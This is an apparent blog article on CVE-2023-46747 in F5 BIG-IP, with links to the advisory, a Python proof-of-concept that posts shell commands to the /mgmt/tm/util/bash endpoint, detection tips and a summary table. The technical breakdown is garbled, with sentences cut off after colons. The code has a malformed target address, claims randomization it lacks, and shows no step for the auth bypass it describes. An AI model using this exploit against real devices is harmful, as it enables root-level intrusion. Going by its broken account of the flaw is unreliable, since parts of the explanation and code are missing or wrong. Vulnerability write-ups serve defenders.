CVE-2023-46747 - Breaking Down the BIG-IP Remote Command Execution Flaw (With Exploit Walkthrough)

When BIG-IP—a widely used Application Delivery Controller by F5 Networks—gets a serious flaw, thousands of enterprises from finance to government risk compromise. Coming to light in late 2023, CVE-2023-46747 is one of those chilling bugs for defenders, but a goldmine for attackers. This article breaks it down in simple American terms: what it is, how it works, and how hackers can weaponize it.

Official Advisory

- F5 Security Advisory K000137353
- NVD CVE page
- Original SSD Disclosure (Pentera)

Technical Breakdown (Simple Terms)

BIG-IP’s Configuration Utility helps admins manage the device via a web browser. Normally, you need to log in first. But due to this bug:

Attacker chains this to another function:

By abusing internal APIs (like the Device Diagnostic shell), they issue a system command (e.g., id).

Proof-of-Concept Exploit

Note: This is for educational/defensive purposes only. DO NOT use against systems you don’t own!

Example Code: Remote Command Execution

Below is a trimmed Python snippet inspired by public exploit code (with randomization for opsec):

import requests

# Target BIG-IP (replace with the real IP address)
TARGET = 'https://192..2.123';

# The vulnerable endpoint abused by the exploit
VULN_PATH = '/mgmt/tm/util/bash'

# Arbitrary command to run (example: id)
CMD = "id"

# BIG-IP uses self-signed SSL, so we disable warnings here
requests.packages.urllib3.disable_warnings()

def exploit(target, cmd):
    url = target + VULN_PATH
    headers = {"Content-Type": "application/json"}
    data = {
        "command": "run",
        "utilCmdArgs": "-c '%s'" % cmd
    }
    r = requests.post(url, json=data, headers=headers, verify=False)
    if r.status_code == 200 and 'commandResult' in r.text:
        print("[+] Command output:\n", r.json()['commandResult'])
    else:
        print("[-] Exploit failed or device not vulnerable.")

exploit(TARGET, CMD)

What just happened?
The script sends a POST request with JSON body to /mgmt/tm/util/bash pretending to be legit, but skips all auth layers. If the bug is unfixed, the device executes the 'id' shell command and returns the result.

Patch immediately!

F5 has issued fixes. See their advisory for exact versions.

Monitor unusual activity:

Watch logs for strange POST requests to /mgmt/tm/util/bash or similar endpoints.
- Isolate old/EoTS devices or decommission them.

Real-World Impact

This bug is being actively scanned for and attempted on exposed devices. Shadowserver and threat intelligence feeds confirm increased scanning after disclosure.

If you leave a BIG-IP with this bug open to the internet, you’re practically handing over the keys.

References

- F5 K000137353 Advisory
- NVD CVE Listing
- Pentera SSD Full Disclosure Blog
- Exploit Example (GitHub)

Summary Table

| Key Fact | Details |
|------------------------------|---------------------------------------------------------------------------|
| CVE Number | CVE-2023-46747 |
| Affected Product | F5 BIG-IP (various versions; see advisory) |
| Attack Vector | Network access to management or self IP |
| Privilege Required | None! Publicly reachable is enough |
| Impact | Remote code execution as root |
| Solution | Apply patch, restrict access, monitor logs |


Stay safe: Always patch high-profile appliances, and never expose management ports to untrusted networks!

Timeline

Published on: 10/26/2023 21:15:00 UTC
Last modified on: 10/27/2023 12:41:00 UTC